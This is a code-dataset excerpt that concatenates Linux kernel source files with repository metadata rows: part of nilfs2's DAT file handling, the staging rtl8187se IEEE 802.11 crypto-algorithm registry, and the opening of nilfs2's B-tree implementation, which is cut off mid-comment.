	}

	kaddr = kmap_atomic(req->pr_entry_bh->b_page);
	entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
					     req->pr_entry_bh, kaddr);
	start = le64_to_cpu(entry->de_start);
	blocknr = le64_to_cpu(entry->de_blocknr);
	kunmap_atomic(kaddr);

	if (blocknr == 0) {
		ret = nilfs_palloc_prepare_free_entry(dat, req);
		if (ret < 0) {
			nilfs_dat_abort_entry(dat, req);
			return ret;
		}
	}

	return 0;
}
/* end an entry's lifetime: set de_end to the current checkpoint
 * number unless @dead (then the lifetime stays empty), and free the
 * entry entirely when it was never bound to a disk block */
void nilfs_dat_commit_end(struct inode *dat, struct nilfs_palloc_req *req,
			  int dead)
{
	struct nilfs_dat_entry *entry;
	__u64 start, end;
	sector_t blocknr;
	void *kaddr;

	kaddr = kmap_atomic(req->pr_entry_bh->b_page);
	entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
					     req->pr_entry_bh, kaddr);
	end = start = le64_to_cpu(entry->de_start);
	if (!dead) {
		end = nilfs_mdt_cno(dat);
		WARN_ON(start > end);
	}
	entry->de_end = cpu_to_le64(end);
	blocknr = le64_to_cpu(entry->de_blocknr);
	kunmap_atomic(kaddr);

	if (blocknr == 0)
		nilfs_dat_commit_free(dat, req);
	else
		nilfs_dat_commit_entry(dat, req);
}

/* undo nilfs_dat_prepare_end(): cancel the reserved deallocation if
 * one was made, then drop the buffer reference */
void nilfs_dat_abort_end(struct inode *dat, struct nilfs_palloc_req *req)
{
	struct nilfs_dat_entry *entry;
	__u64 start;
	sector_t blocknr;
	void *kaddr;

	kaddr = kmap_atomic(req->pr_entry_bh->b_page);
	entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
					     req->pr_entry_bh, kaddr);
	start = le64_to_cpu(entry->de_start);
	blocknr = le64_to_cpu(entry->de_blocknr);
	kunmap_atomic(kaddr);

	/* a free was only reserved for a just-started, unbound entry */
	if (start == nilfs_mdt_cno(dat) && blocknr == 0)
		nilfs_palloc_abort_free_entry(dat, req);
	nilfs_dat_abort_entry(dat, req);
}
/* prepare an update: end the old entry and allocate the new one; the
 * end-preparation is rolled back when the allocation fails */
int nilfs_dat_prepare_update(struct inode *dat,
			     struct nilfs_palloc_req *oldreq,
			     struct nilfs_palloc_req *newreq)
{
	int err;

	err = nilfs_dat_prepare_end(dat, oldreq);
	if (err)
		return err;

	err = nilfs_dat_prepare_alloc(dat, newreq);
	if (err < 0)
		nilfs_dat_abort_end(dat, oldreq);

	return err;
}
/* commit both halves of a prepared update: old entry ends, new entry
 * becomes live */
void nilfs_dat_commit_update(struct inode *dat,
			     struct nilfs_palloc_req *oldreq,
			     struct nilfs_palloc_req *newreq, int dead)
{
	nilfs_dat_commit_end(dat, oldreq, dead);
	nilfs_dat_commit_alloc(dat, newreq);
}

/* roll back both halves of a prepared update */
void nilfs_dat_abort_update(struct inode *dat,
			    struct nilfs_palloc_req *oldreq,
			    struct nilfs_palloc_req *newreq)
{
	nilfs_dat_abort_end(dat, oldreq);
	nilfs_dat_abort_alloc(dat, newreq);
}
/**
 * nilfs_dat_mark_dirty -
 * @dat: DAT file inode
 * @vblocknr: virtual block number
 *
 * Description: nilfs_dat_mark_dirty() loads the entry block containing
 * the DAT entry of @vblocknr and marks it (and the DAT inode) dirty so
 * the entry gets written out.
 *
 * Return Value: On success, 0 is returned. On error, one of the following
 * negative error codes is returned.
 *
 * %-EIO - I/O error.
 *
 * %-ENOMEM - Insufficient amount of memory available.
 */
int nilfs_dat_mark_dirty(struct inode *dat, __u64 vblocknr)
{
	struct nilfs_palloc_req req;
	int ret;

	req.pr_entry_nr = vblocknr;
	ret = nilfs_dat_prepare_entry(dat, &req, 0);
	if (ret == 0)
		nilfs_dat_commit_entry(dat, &req);
	return ret;
}
/**
 * nilfs_dat_freev - free virtual block numbers
 * @dat: DAT file inode
 * @vblocknrs: array of virtual block numbers
 * @nitems: number of virtual block numbers
 *
 * Description: nilfs_dat_freev() frees the virtual block numbers specified by
 * @vblocknrs and @nitems.  It is a thin wrapper around the persistent
 * object allocator's bulk free.
 *
 * Return Value: On success, 0 is returned. On error, one of the following
 * negative error codes is returned.
 *
 * %-EIO - I/O error.
 *
 * %-ENOMEM - Insufficient amount of memory available.
 *
 * %-ENOENT - The virtual block number have not been allocated.
 */
int nilfs_dat_freev(struct inode *dat, __u64 *vblocknrs, size_t nitems)
{
	return nilfs_palloc_freev(dat, vblocknrs, nitems);
}
/**
 * nilfs_dat_move - change a block number
 * @dat: DAT file inode
 * @vblocknr: virtual block number
 * @blocknr: block number
 *
 * Description: nilfs_dat_move() changes the block number associated with
 * @vblocknr to @blocknr.
 *
 * Return Value: On success, 0 is returned. On error, one of the following
 * negative error codes is returned.
 *
 * %-EIO - I/O error.
 *
 * %-ENOMEM - Insufficient amount of memory available.
 */
int nilfs_dat_move(struct inode *dat, __u64 vblocknr, sector_t blocknr)
{
	struct buffer_head *entry_bh;
	struct nilfs_dat_entry *entry;
	void *kaddr;
	int ret;

	ret = nilfs_palloc_get_entry_block(dat, vblocknr, 0, &entry_bh);
	if (ret < 0)
		return ret;

	/*
	 * The given disk block number (blocknr) is not yet written to
	 * the device at this point.
	 *
	 * To prevent nilfs_dat_translate() from returning the
	 * uncommitted block number, this makes a copy of the entry
	 * buffer and redirects nilfs_dat_translate() to the copy.
	 */
	if (!buffer_nilfs_redirected(entry_bh)) {
		ret = nilfs_mdt_freeze_buffer(dat, entry_bh);
		if (ret) {
			brelse(entry_bh);
			return ret;
		}
	}

	kaddr = kmap_atomic(entry_bh->b_page);
	entry = nilfs_palloc_block_get_entry(dat, vblocknr, entry_bh, kaddr);
	/* an unbound entry (blocknr 0) cannot be moved */
	if (unlikely(entry->de_blocknr == cpu_to_le64(0))) {
		printk(KERN_CRIT "%s: vbn = %llu, [%llu, %llu)\n", __func__,
		       (unsigned long long)vblocknr,
		       (unsigned long long)le64_to_cpu(entry->de_start),
		       (unsigned long long)le64_to_cpu(entry->de_end));
		kunmap_atomic(kaddr);
		brelse(entry_bh);
		return -EINVAL;
	}
	WARN_ON(blocknr == 0);
	entry->de_blocknr = cpu_to_le64(blocknr);
	kunmap_atomic(kaddr);

	mark_buffer_dirty(entry_bh);
	nilfs_mdt_mark_dirty(dat);

	brelse(entry_bh);

	return 0;
}
/**
 * nilfs_dat_translate - translate a virtual block number to a block number
 * @dat: DAT file inode
 * @vblocknr: virtual block number
 * @blocknrp: pointer to a block number
 *
 * Description: nilfs_dat_translate() maps the virtual block number @vblocknr
 * to the corresponding block number.
 *
 * Return Value: On success, 0 is returned and the block number associated
 * with @vblocknr is stored in the place pointed by @blocknrp. On error, one
 * of the following negative error codes is returned.
 *
 * %-EIO - I/O error.
 *
 * %-ENOMEM - Insufficient amount of memory available.
 *
 * %-ENOENT - A block number associated with @vblocknr does not exist.
 */
int nilfs_dat_translate(struct inode *dat, __u64 vblocknr, sector_t *blocknrp)
{
	struct buffer_head *entry_bh, *bh;
	struct nilfs_dat_entry *entry;
	sector_t blocknr;
	void *kaddr;
	int ret;

	ret = nilfs_palloc_get_entry_block(dat, vblocknr, 0, &entry_bh);
	if (ret < 0)
		return ret;

	/*
	 * A redirected buffer has a frozen (pre-update) copy; outside of GC,
	 * read from that copy so uncommitted block numbers are not exposed
	 * (see the comment in nilfs_dat_move()).
	 */
	if (!nilfs_doing_gc() && buffer_nilfs_redirected(entry_bh)) {
		bh = nilfs_mdt_get_frozen_buffer(dat, entry_bh);
		if (bh) {
			WARN_ON(!buffer_uptodate(bh));
			brelse(entry_bh);
			entry_bh = bh;
		}
	}
	kaddr = kmap_atomic(entry_bh->b_page);
	entry = nilfs_palloc_block_get_entry(dat, vblocknr, entry_bh, kaddr);
	blocknr = le64_to_cpu(entry->de_blocknr);
	/* a zero de_blocknr means no disk block is assigned to @vblocknr */
	if (blocknr == 0) {
		ret = -ENOENT;
		goto out;
	}
	*blocknrp = blocknr;

 out:
	kunmap_atomic(kaddr);
	brelse(entry_bh);
	return ret;
}
/**
 * nilfs_dat_get_vinfo - fill in information on virtual block numbers
 * @dat: DAT file inode
 * @buf: array of nilfs_vinfo records; vi_vblocknr is filled in by the caller
 * @visz: byte stride of one record in @buf
 * @nvi: number of records in @buf
 *
 * For every requested virtual block number, copies de_start, de_end and
 * de_blocknr from its DAT entry into the matching record.  Records whose
 * vi_vblocknr falls into the same entry block are served from a single
 * block read.
 *
 * NOTE(review): the inner loop advances only while consecutive records stay
 * within the current entry block, which assumes the vi_vblocknr values are
 * sorted in ascending order — confirm against callers.
 *
 * Returns @nvi on success, or a negative error code from
 * nilfs_palloc_get_entry_block().
 */
ssize_t nilfs_dat_get_vinfo(struct inode *dat, void *buf, unsigned visz,
			    size_t nvi)
{
	struct buffer_head *entry_bh;
	struct nilfs_dat_entry *entry;
	struct nilfs_vinfo *vinfo = buf;
	__u64 first, last;
	void *kaddr;
	unsigned long entries_per_block = NILFS_MDT(dat)->mi_entries_per_block;
	int i, j, n, ret;

	for (i = 0; i < nvi; i += n) {
		ret = nilfs_palloc_get_entry_block(dat, vinfo->vi_vblocknr,
						   0, &entry_bh);
		if (ret < 0)
			return ret;
		kaddr = kmap_atomic(entry_bh->b_page);
		/* first and last virtual block numbers in this block */
		first = vinfo->vi_vblocknr;
		do_div(first, entries_per_block);
		first *= entries_per_block;
		last = first + entries_per_block - 1;
		for (j = i, n = 0;
		     j < nvi && vinfo->vi_vblocknr >= first &&
			     vinfo->vi_vblocknr <= last;
		     j++, n++, vinfo = (void *)vinfo + visz) {
			entry = nilfs_palloc_block_get_entry(
				dat, vinfo->vi_vblocknr, entry_bh, kaddr);
			vinfo->vi_start = le64_to_cpu(entry->de_start);
			vinfo->vi_end = le64_to_cpu(entry->de_end);
			vinfo->vi_blocknr = le64_to_cpu(entry->de_blocknr);
		}
		kunmap_atomic(kaddr);
		brelse(entry_bh);
	}
	return nvi;
}
/**
 * nilfs_dat_read - read or get dat inode
 * @sb: super block instance
 * @entry_size: size of a dat entry
 * @raw_inode: on-disk dat inode
 * @inodep: buffer to store the inode
 *
 * Returns 0 and stores the DAT inode in *@inodep on success; on failure
 * returns -ENOMEM (inode lookup failed) or the error from one of the
 * initialization helpers.
 */
int nilfs_dat_read(struct super_block *sb, size_t entry_size,
		   struct nilfs_inode *raw_inode, struct inode **inodep)
{
	static struct lock_class_key dat_lock_key;
	struct inode *dat;
	struct nilfs_dat_info *di;
	int err;

	dat = nilfs_iget_locked(sb, NULL, NILFS_DAT_INO);
	if (unlikely(!dat))
		return -ENOMEM;
	/* an already-initialized (cached) inode can be returned as-is */
	if (!(dat->i_state & I_NEW))
		goto out;

	err = nilfs_mdt_init(dat, NILFS_MDT_GFP, sizeof(*di));
	if (err)
		goto failed;

	err = nilfs_palloc_init_blockgroup(dat, entry_size);
	if (err)
		goto failed;

	di = NILFS_DAT_I(dat);
	/* give the DAT semaphore its own lockdep class to avoid false reports */
	lockdep_set_class(&di->mi.mi_sem, &dat_lock_key);
	nilfs_palloc_setup_cache(dat, &di->palloc_cache);
	nilfs_mdt_setup_shadow_map(dat, &di->shadow);

	err = nilfs_read_inode_common(dat, raw_inode);
	if (err)
		goto failed;

	unlock_new_inode(dat);
 out:
	*inodep = dat;
	return 0;
 failed:
	iget_failed(dat);
	return err;
}
| gpl-2.0 |
GustavoRD78/78Kernel-MOB31E.Z1.3657 | drivers/staging/rtl8187se/ieee80211/ieee80211_crypt.c | 5634 | 5621 | /*
* Host AP crypto routines
*
* Copyright (c) 2002-2003, Jouni Malinen <jkmaline@cc.hut.fi>
* Portions Copyright (C) 2004, Intel Corporation <jketreno@linux.intel.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation. See README and COPYING for
* more details.
*
*/
//#include <linux/config.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <asm/string.h>
#include <asm/errno.h>
#include "ieee80211.h"
MODULE_AUTHOR("Jouni Malinen");
MODULE_DESCRIPTION("HostAP crypto");
MODULE_LICENSE("GPL");
/* One registered crypto algorithm: links an ops table into the registry. */
struct ieee80211_crypto_alg {
	struct list_head list;
	struct ieee80211_crypto_ops *ops;
};

/* Registry of crypto algorithms; @lock guards @algs. */
struct ieee80211_crypto {
	struct list_head algs;
	spinlock_t lock;
};

/* Singleton registry; NULL until ieee80211_crypto_init() has run. */
static struct ieee80211_crypto *hcrypt;
/*
 * Walk the per-device delayed-deinit list and destroy entries.  Entries
 * whose refcnt is still nonzero are skipped unless @force is set.
 * Caller must hold ieee->lock (see ieee80211_crypt_deinit_handler()).
 */
void ieee80211_crypt_deinit_entries(struct ieee80211_device *ieee,
				    int force)
{
	struct list_head *ptr, *n;
	struct ieee80211_crypt_data *entry;

	/* open-coded "safe" traversal: n is fetched before ptr is deleted */
	for (ptr = ieee->crypt_deinit_list.next, n = ptr->next;
	     ptr != &ieee->crypt_deinit_list; ptr = n, n = ptr->next) {
		entry = list_entry(ptr, struct ieee80211_crypt_data, list);

		if (atomic_read(&entry->refcnt) != 0 && !force)
			continue;

		list_del(ptr);

		if (entry->ops)
			entry->ops->deinit(entry->priv);
		kfree(entry);
	}
}
/*
 * Timer callback: try a non-forced pass over the delayed-deinit list.
 * If entries are still referenced, rearm the timer for one second later.
 */
void ieee80211_crypt_deinit_handler(unsigned long data)
{
	struct ieee80211_device *ieee = (struct ieee80211_device *)data;
	unsigned long flags;

	spin_lock_irqsave(&ieee->lock, flags);
	ieee80211_crypt_deinit_entries(ieee, 0);
	if (!list_empty(&ieee->crypt_deinit_list)) {
		printk(KERN_DEBUG "%s: entries remaining in delayed crypt "
		       "deletion list\n", ieee->dev->name);
		ieee->crypt_deinit_timer.expires = jiffies + HZ;
		add_timer(&ieee->crypt_deinit_timer);
	}
	spin_unlock_irqrestore(&ieee->lock, flags);
}
/*
 * Detach *@crypt from its owner and queue it for delayed destruction,
 * arming the cleanup timer if it is not already pending.  *@crypt is
 * set to NULL so the caller cannot use the context afterwards.
 */
void ieee80211_crypt_delayed_deinit(struct ieee80211_device *ieee,
				    struct ieee80211_crypt_data **crypt)
{
	struct ieee80211_crypt_data *tmp;
	unsigned long flags;

	if (*crypt == NULL)
		return;

	tmp = *crypt;
	*crypt = NULL;

	/* must not run ops->deinit() while there may be pending encrypt or
	 * decrypt operations. Use a list of delayed deinits to avoid needing
	 * locking. */

	spin_lock_irqsave(&ieee->lock, flags);
	list_add(&tmp->list, &ieee->crypt_deinit_list);
	if (!timer_pending(&ieee->crypt_deinit_timer)) {
		ieee->crypt_deinit_timer.expires = jiffies + HZ;
		add_timer(&ieee->crypt_deinit_timer);
	}
	spin_unlock_irqrestore(&ieee->lock, flags);
}
/*
 * Register a crypto algorithm with the global registry.
 * Returns 0 on success, -1 if the registry is not initialized, and
 * -ENOMEM if the list node cannot be allocated.
 */
int ieee80211_register_crypto_ops(struct ieee80211_crypto_ops *ops)
{
	struct ieee80211_crypto_alg *alg;
	unsigned long flags;

	if (!hcrypt)
		return -1;

	alg = kzalloc(sizeof(*alg), GFP_KERNEL);
	if (!alg)
		return -ENOMEM;
	alg->ops = ops;

	/* publish the new entry under the registry lock */
	spin_lock_irqsave(&hcrypt->lock, flags);
	list_add(&alg->list, &hcrypt->algs);
	spin_unlock_irqrestore(&hcrypt->lock, flags);

	printk(KERN_DEBUG "ieee80211_crypt: registered algorithm '%s'\n",
	       ops->name);
	return 0;
}
int ieee80211_unregister_crypto_ops(struct ieee80211_crypto_ops *ops)
{
unsigned long flags;
struct list_head *ptr;
struct ieee80211_crypto_alg *del_alg = NULL;
if (hcrypt == NULL)
return -1;
spin_lock_irqsave(&hcrypt->lock, flags);
for (ptr = hcrypt->algs.next; ptr != &hcrypt->algs; ptr = ptr->next) {
struct ieee80211_crypto_alg *alg =
(struct ieee80211_crypto_alg *) ptr;
if (alg->ops == ops) {
list_del(&alg->list);
del_alg = alg;
break;
}
}
spin_unlock_irqrestore(&hcrypt->lock, flags);
if (del_alg) {
printk(KERN_DEBUG "ieee80211_crypt: unregistered algorithm "
"'%s'\n", ops->name);
kfree(del_alg);
}
return del_alg ? 0 : -1;
}
struct ieee80211_crypto_ops * ieee80211_get_crypto_ops(const char *name)
{
unsigned long flags;
struct list_head *ptr;
struct ieee80211_crypto_alg *found_alg = NULL;
if (hcrypt == NULL)
return NULL;
spin_lock_irqsave(&hcrypt->lock, flags);
for (ptr = hcrypt->algs.next; ptr != &hcrypt->algs; ptr = ptr->next) {
struct ieee80211_crypto_alg *alg =
(struct ieee80211_crypto_alg *) ptr;
if (strcmp(alg->ops->name, name) == 0) {
found_alg = alg;
break;
}
}
spin_unlock_irqrestore(&hcrypt->lock, flags);
if (found_alg)
return found_alg->ops;
else
return NULL;
}
/* NULL cipher: init returns a dummy non-NULL priv token, deinit is a no-op. */
static void * ieee80211_crypt_null_init(int keyidx) { return (void *) 1; }
static void ieee80211_crypt_null_deinit(void *priv) {}
/*
 * Pass-through "NULL" algorithm registered at init time: all crypto hooks
 * are NULL, so frames are neither transformed nor expanded.
 */
static struct ieee80211_crypto_ops ieee80211_crypt_null = {
	.name			= "NULL",
	.init			= ieee80211_crypt_null_init,
	.deinit			= ieee80211_crypt_null_deinit,
	.encrypt_mpdu		= NULL,
	.decrypt_mpdu		= NULL,
	.encrypt_msdu		= NULL,
	.decrypt_msdu		= NULL,
	.set_key		= NULL,
	.get_key		= NULL,
	.extra_prefix_len	= 0,
	.extra_postfix_len	= 0,
	.owner			= THIS_MODULE,
};
/*
 * Allocate the global crypto registry and register the built-in NULL
 * algorithm.  Returns 0 on success or a negative error code; on failure
 * the registry pointer is left NULL.
 */
int ieee80211_crypto_init(void)
{
	int ret;

	hcrypt = kzalloc(sizeof(*hcrypt), GFP_KERNEL);
	if (hcrypt == NULL)
		return -ENOMEM;

	INIT_LIST_HEAD(&hcrypt->algs);
	spin_lock_init(&hcrypt->lock);

	ret = ieee80211_register_crypto_ops(&ieee80211_crypt_null);
	if (ret < 0) {
		/* roll back so later calls see an uninitialized registry */
		kfree(hcrypt);
		hcrypt = NULL;
	}
	return ret;
}
void ieee80211_crypto_deinit(void)
{
struct list_head *ptr, *n;
struct ieee80211_crypto_alg *alg = NULL;
if (hcrypt == NULL)
return;
list_for_each_safe(ptr, n, &hcrypt->algs) {
alg = list_entry(ptr, struct ieee80211_crypto_alg, list);
if (alg) {
list_del(ptr);
printk(KERN_DEBUG
"ieee80211_crypt: unregistered algorithm '%s' (deinit)\n",
alg->ops->name);
kfree(alg);
}
}
kfree(hcrypt);
}
| gpl-2.0 |
cherifyass/s4-gpe-kernel | fs/nilfs2/btree.c | 9986 | 61414 | /*
* btree.c - NILFS B-tree.
*
* Copyright (C) 2005-2008 Nippon Telegraph and Telephone Corporation.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
* Written by Koji Sato <koji@osrg.net>.
*/
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/errno.h>
#include <linux/pagevec.h>
#include "nilfs.h"
#include "page.h"
#include "btnode.h"
#include "btree.h"
#include "alloc.h"
#include "dat.h"
/*
 * Allocate a btree path array from the slab cache and reset every level
 * to an empty state.  Returns NULL if the allocation fails.
 */
static struct nilfs_btree_path *nilfs_btree_alloc_path(void)
{
	struct nilfs_btree_path *path;
	int level;

	path = kmem_cache_alloc(nilfs_btree_path_cache, GFP_NOFS);
	if (path == NULL)
		return NULL;

	for (level = NILFS_BTREE_LEVEL_DATA;
	     level < NILFS_BTREE_LEVEL_MAX; level++) {
		struct nilfs_btree_path *p = &path[level];

		p->bp_bh = NULL;
		p->bp_sib_bh = NULL;
		p->bp_index = 0;
		p->bp_oldreq.bpr_ptr = NILFS_BMAP_INVALID_PTR;
		p->bp_newreq.bpr_ptr = NILFS_BMAP_INVALID_PTR;
		p->bp_op = NULL;
	}
	return path;
}
/*
 * Release the buffer heads held at each level of @path (brelse tolerates
 * NULL) and return the array to the slab cache.
 */
static void nilfs_btree_free_path(struct nilfs_btree_path *path)
{
	int level;

	for (level = NILFS_BTREE_LEVEL_DATA;
	     level < NILFS_BTREE_LEVEL_MAX; level++)
		brelse(path[level].bp_bh);

	kmem_cache_free(nilfs_btree_path_cache, path);
}
/*
* B-tree node operations
*/
/*
 * Create a new btree node block at @ptr in the owner inode's btnode cache
 * and mark it volatile.  Stores the buffer head in *@bhp; returns 0 or
 * -ENOMEM if the block cannot be created.
 */
static int nilfs_btree_get_new_block(const struct nilfs_bmap *btree,
				     __u64 ptr, struct buffer_head **bhp)
{
	struct address_space *btnc = &NILFS_BMAP_I(btree)->i_btnode_cache;
	struct buffer_head *bh;

	bh = nilfs_btnode_create_block(btnc, ptr);
	if (!bh)
		return -ENOMEM;

	set_buffer_nilfs_volatile(bh);
	*bhp = bh;
	return 0;
}
/* --- accessors for the on-disk btree node header and its arrays --- */

static int nilfs_btree_node_get_flags(const struct nilfs_btree_node *node)
{
	return node->bn_flags;
}

static void
nilfs_btree_node_set_flags(struct nilfs_btree_node *node, int flags)
{
	node->bn_flags = flags;
}

/* nonzero if @node is the root node embedded in the bmap */
static int nilfs_btree_node_root(const struct nilfs_btree_node *node)
{
	return nilfs_btree_node_get_flags(node) & NILFS_BTREE_NODE_ROOT;
}

static int nilfs_btree_node_get_level(const struct nilfs_btree_node *node)
{
	return node->bn_level;
}

static void
nilfs_btree_node_set_level(struct nilfs_btree_node *node, int level)
{
	node->bn_level = level;
}

static int nilfs_btree_node_get_nchildren(const struct nilfs_btree_node *node)
{
	return le16_to_cpu(node->bn_nchildren);
}

static void
nilfs_btree_node_set_nchildren(struct nilfs_btree_node *node, int nchildren)
{
	node->bn_nchildren = cpu_to_le16(nchildren);
}

/* node size equals the block size of the owner inode */
static int nilfs_btree_node_size(const struct nilfs_bmap *btree)
{
	return 1 << btree->b_inode->i_blkbits;
}

static int nilfs_btree_nchildren_per_block(const struct nilfs_bmap *btree)
{
	return btree->b_nchildren_per_block;
}

/*
 * Key array begins right after the header; non-root nodes carry extra
 * padding between the header and the keys.
 */
static __le64 *
nilfs_btree_node_dkeys(const struct nilfs_btree_node *node)
{
	return (__le64 *)((char *)(node + 1) +
			  (nilfs_btree_node_root(node) ?
			   0 : NILFS_BTREE_NODE_EXTRA_PAD_SIZE));
}

/* pointer array follows @ncmax key slots */
static __le64 *
nilfs_btree_node_dptrs(const struct nilfs_btree_node *node, int ncmax)
{
	return (__le64 *)(nilfs_btree_node_dkeys(node) + ncmax);
}

static __u64
nilfs_btree_node_get_key(const struct nilfs_btree_node *node, int index)
{
	return le64_to_cpu(*(nilfs_btree_node_dkeys(node) + index));
}

static void
nilfs_btree_node_set_key(struct nilfs_btree_node *node, int index, __u64 key)
{
	*(nilfs_btree_node_dkeys(node) + index) = cpu_to_le64(key);
}

static __u64
nilfs_btree_node_get_ptr(const struct nilfs_btree_node *node, int index,
			 int ncmax)
{
	return le64_to_cpu(*(nilfs_btree_node_dptrs(node, ncmax) + index));
}

static void
nilfs_btree_node_set_ptr(struct nilfs_btree_node *node, int index, __u64 ptr,
			 int ncmax)
{
	*(nilfs_btree_node_dptrs(node, ncmax) + index) = cpu_to_le64(ptr);
}
/*
 * Initialize a btree node header and populate its key/pointer arrays from
 * the CPU-order arrays @keys and @ptrs (@nchildren entries each).
 */
static void nilfs_btree_node_init(struct nilfs_btree_node *node, int flags,
				  int level, int nchildren, int ncmax,
				  const __u64 *keys, const __u64 *ptrs)
{
	__le64 *dkeys;
	__le64 *dptrs;
	int i;

	nilfs_btree_node_set_flags(node, flags);
	nilfs_btree_node_set_level(node, level);
	nilfs_btree_node_set_nchildren(node, nchildren);

	dkeys = nilfs_btree_node_dkeys(node);
	dptrs = nilfs_btree_node_dptrs(node, ncmax);
	for (i = 0; i < nchildren; i++) {
		dkeys[i] = cpu_to_le64(keys[i]);
		dptrs[i] = cpu_to_le64(ptrs[i]);
	}
}
/*
 * Move the first @n children of @right to the end of @left.
 * Assume the buffer heads corresponding to left and right are locked.
 */
static void nilfs_btree_node_move_left(struct nilfs_btree_node *left,
				       struct nilfs_btree_node *right,
				       int n, int lncmax, int rncmax)
{
	__le64 *ldkeys, *rdkeys;
	__le64 *ldptrs, *rdptrs;
	int lnchildren, rnchildren;

	ldkeys = nilfs_btree_node_dkeys(left);
	ldptrs = nilfs_btree_node_dptrs(left, lncmax);
	lnchildren = nilfs_btree_node_get_nchildren(left);

	rdkeys = nilfs_btree_node_dkeys(right);
	rdptrs = nilfs_btree_node_dptrs(right, rncmax);
	rnchildren = nilfs_btree_node_get_nchildren(right);

	/* append right's head to left, then close the gap in right */
	memcpy(ldkeys + lnchildren, rdkeys, n * sizeof(*rdkeys));
	memcpy(ldptrs + lnchildren, rdptrs, n * sizeof(*rdptrs));
	memmove(rdkeys, rdkeys + n, (rnchildren - n) * sizeof(*rdkeys));
	memmove(rdptrs, rdptrs + n, (rnchildren - n) * sizeof(*rdptrs));

	lnchildren += n;
	rnchildren -= n;
	nilfs_btree_node_set_nchildren(left, lnchildren);
	nilfs_btree_node_set_nchildren(right, rnchildren);
}

/*
 * Move the last @n children of @left to the front of @right.
 * Assume that the buffer heads corresponding to left and right are locked.
 */
static void nilfs_btree_node_move_right(struct nilfs_btree_node *left,
					struct nilfs_btree_node *right,
					int n, int lncmax, int rncmax)
{
	__le64 *ldkeys, *rdkeys;
	__le64 *ldptrs, *rdptrs;
	int lnchildren, rnchildren;

	ldkeys = nilfs_btree_node_dkeys(left);
	ldptrs = nilfs_btree_node_dptrs(left, lncmax);
	lnchildren = nilfs_btree_node_get_nchildren(left);

	rdkeys = nilfs_btree_node_dkeys(right);
	rdptrs = nilfs_btree_node_dptrs(right, rncmax);
	rnchildren = nilfs_btree_node_get_nchildren(right);

	/* make room at right's front first, then copy left's tail into it */
	memmove(rdkeys + n, rdkeys, rnchildren * sizeof(*rdkeys));
	memmove(rdptrs + n, rdptrs, rnchildren * sizeof(*rdptrs));
	memcpy(rdkeys, ldkeys + lnchildren - n, n * sizeof(*rdkeys));
	memcpy(rdptrs, ldptrs + lnchildren - n, n * sizeof(*rdptrs));

	lnchildren -= n;
	rnchildren += n;
	nilfs_btree_node_set_nchildren(left, lnchildren);
	nilfs_btree_node_set_nchildren(right, rnchildren);
}
/*
 * Insert (@key, @ptr) at @index, shifting later entries up by one.
 * Assume that the buffer head corresponding to node is locked.
 */
static void nilfs_btree_node_insert(struct nilfs_btree_node *node, int index,
				    __u64 key, __u64 ptr, int ncmax)
{
	__le64 *dkeys;
	__le64 *dptrs;
	int nchildren;

	dkeys = nilfs_btree_node_dkeys(node);
	dptrs = nilfs_btree_node_dptrs(node, ncmax);
	nchildren = nilfs_btree_node_get_nchildren(node);
	if (index < nchildren) {
		memmove(dkeys + index + 1, dkeys + index,
			(nchildren - index) * sizeof(*dkeys));
		memmove(dptrs + index + 1, dptrs + index,
			(nchildren - index) * sizeof(*dptrs));
	}
	dkeys[index] = cpu_to_le64(key);
	dptrs[index] = cpu_to_le64(ptr);
	nchildren++;
	nilfs_btree_node_set_nchildren(node, nchildren);
}
/*
 * Delete the entry at @index, optionally returning its key and pointer via
 * @keyp/@ptrp, and shift later entries down by one.
 * Assume that the buffer head corresponding to node is locked.
 */
static void nilfs_btree_node_delete(struct nilfs_btree_node *node, int index,
				    __u64 *keyp, __u64 *ptrp, int ncmax)
{
	__u64 key;
	__u64 ptr;
	__le64 *dkeys;
	__le64 *dptrs;
	int nchildren;

	dkeys = nilfs_btree_node_dkeys(node);
	dptrs = nilfs_btree_node_dptrs(node, ncmax);
	key = le64_to_cpu(dkeys[index]);
	ptr = le64_to_cpu(dptrs[index]);
	nchildren = nilfs_btree_node_get_nchildren(node);
	if (keyp != NULL)
		*keyp = key;
	if (ptrp != NULL)
		*ptrp = ptr;

	if (index < nchildren - 1) {
		memmove(dkeys + index, dkeys + index + 1,
			(nchildren - index - 1) * sizeof(*dkeys));
		memmove(dptrs + index, dptrs + index + 1,
			(nchildren - index - 1) * sizeof(*dptrs));
	}
	nchildren--;
	nilfs_btree_node_set_nchildren(node, nchildren);
}
/*
 * Binary-search @node for @key.  Stores the resulting child index in
 * *@indexp and returns nonzero on an exact match.
 *
 * On a miss, the index is adjusted depending on the node kind: internal
 * nodes step back to the child whose subtree can contain @key, while
 * leaf-level nodes step forward to the insertion position.
 */
static int nilfs_btree_node_lookup(const struct nilfs_btree_node *node,
				   __u64 key, int *indexp)
{
	__u64 nkey;
	int index, low, high, s;

	/* binary search */
	low = 0;
	high = nilfs_btree_node_get_nchildren(node) - 1;
	index = 0;
	s = 0;
	while (low <= high) {
		index = (low + high) / 2;
		nkey = nilfs_btree_node_get_key(node, index);
		if (nkey == key) {
			s = 0;
			goto out;
		} else if (nkey < key) {
			low = index + 1;
			s = -1;
		} else {
			high = index - 1;
			s = 1;
		}
	}

	/* adjust index */
	if (nilfs_btree_node_get_level(node) > NILFS_BTREE_LEVEL_NODE_MIN) {
		if (s > 0 && index > 0)
			index--;
	} else if (s < 0)
		index++;

 out:
	*indexp = index;

	return s == 0;
}
/**
 * nilfs_btree_node_broken - verify consistency of btree node
 * @node: btree node block to be examined
 * @size: node size (in bytes)
 * @blocknr: block number
 *
 * Rejects nodes whose level is out of range, that claim to be a root
